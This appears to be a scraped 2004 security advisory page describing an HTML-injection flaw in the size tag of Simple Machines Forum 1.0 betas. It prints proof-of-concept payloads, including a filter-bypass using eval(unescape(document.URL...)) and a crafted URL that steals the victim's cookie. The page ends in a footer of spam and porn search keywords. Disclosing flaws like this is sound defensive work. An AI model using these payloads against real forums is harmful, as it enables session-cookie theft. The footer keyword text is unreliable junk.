exploits , vulnerabilities , articles , Simple Machines Forum Size Tag HTML Injection Vulnerability
| Title |
Simple Machines Forum Size Tag HTML Injection Vulnerability |
| Published |
2004-05-05-12:00AM |
| Updated |
2004-05-05-07:52PM |
| Class |
Input Validation Error |
| CVE |
CVE-MAP-NOMATCH |
| Remote |
Yes |
| Local |
No |
| Credit |
This vulnerability is credited to Cheng Peng Su <apple_soup@msn.com>. |
| Vulnerable |
Simple Machines SMF 1.0 beta5p
Simple Machines SMF 1.0 beta4p
Simple Machines SMF 1.0 beta4.1 |
| Not Vulnerable |
|
| Code |
No exploit is required for this issue, however Cheng Peng Su <apple_soup@msn.com> provided some proof-of-concept code.
An attacker could reportedly post content to the forums containing:
[size=expression(alert(document.cookie))]Content[/size]
With the limit that the forum software filters out quotes, apostrophes and semicolons.
Another method that circumvents the software filtering would be to post content such as:
[size=expression(eval(unescape(document.URL.substring(document.URL.length-34,document.URL.length))))]Content[/size]
then get the victim to follow:
http://www.example.com/index.php?topic=12345.0&alert('cookie:
'+document.cookie)
Where the '12345.0' is the topic containing the previously posted content. The victim's browser would execute the last 34 characters (as specified in the previously posted 'length-34' content).
|
| TXT |
 |
|
Advertising
|
|
Copyright 2007,
SecurityDot
Thu, 17 Dec 2009 00:19:01 +0000
Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS
EXPLOITS
VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
news for c sixy giral www.japanx www.yaogan EAAL free sex p Xnxx.Com darwin+exp mambo Remo t853t www.sexyme Www.sex 40 www.indian taomf.CN maxcpm.inf News Searc Tampilkan, www.lanzho bunnyteens hump www.cankai Reason: 45 Sucunia.co 0777 indian aun Nikikarimi Luck Sex.fr jyothika s porn vedio how to cre www.tamil PORNPICTUR video musi vgx Ax kos ip board 2 hacked by www.zgneng kar20sex www.xc120. news for C freesex vi qhpzxb.blo Vulnerabil Apache/ Indo sek sad PHP Advanc indean+sex
|